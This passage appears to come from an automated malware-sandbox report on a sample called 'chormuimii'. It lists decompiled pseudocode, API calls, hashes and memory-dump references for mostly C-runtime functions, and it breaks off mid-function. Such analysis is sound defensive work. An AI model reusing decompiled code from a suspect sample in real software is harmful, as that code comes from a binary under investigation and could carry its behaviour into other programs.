Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 021FAE63, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 021FAEE8

Memory Dump Source

Source File: 00000006.00000002.309985075.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_21f0000_chormuimii.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 064fb34535ce9cff4653ff3a278026a41221fb8e0b4bc0262b0ea3af3f7a8c8e
Instruction ID: bf62a1dd7ee834aaedb515c0b4ac3f99b19a228effec673a19202c209bc23876
Opcode Fuzzy Hash: 064fb34535ce9cff4653ff3a278026a41221fb8e0b4bc0262b0ea3af3f7a8c8e
Instruction Fuzzy Hash: 3C2136B1D0065A9FCB00CF99D8447EEFBF5EF48324F14812AD568A3641D738A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 021FAE78, Relevance: 1.6, APIs: 1, Instructions: 54
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 021FAEE8

Memory Dump Source

Source File: 00000006.00000002.309985075.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_21f0000_chormuimii.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 4763c1d1aae49dbfdf2bd434a1ecaa1ed4aab93d03a2109f4c3cc196e3b523c0
Instruction ID: ee71a6e56e625501ee510d208a18ec9480e2dc4735a93b8a77193ffa6af14c66
Opcode Fuzzy Hash: 4763c1d1aae49dbfdf2bd434a1ecaa1ed4aab93d03a2109f4c3cc196e3b523c0
Instruction Fuzzy Hash: 531114B1D0061A9BCB10CF9AD544BEEFBF8EF48324F14852AD928B3640D778A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 004104E0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004104E0() {
				void* _t1;

				_t1 = E0041046E(0); // executed
				return _t1;
			}

0x004104e2
0x004104e8

APIs

__encode_pointer.LIBCMT ref: 004104E2

Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000004,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
Part of subcall function 0041046E: RtlEncodePointer.NTDLL(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104D5

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 0e51a9b5fb3a4ef556cbf6530202f05b5f2c67c7b2b168a65c09d71fd2c62196
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09, Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0xbcb37b41
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0xbcb37b41
				_v812 = _t12;
				_t13 =  *0x422238; // 0x434c84be
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00417081, Relevance: 31.8, APIs: 21, Instructions: 340
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0xbcb37b41
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02281868), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
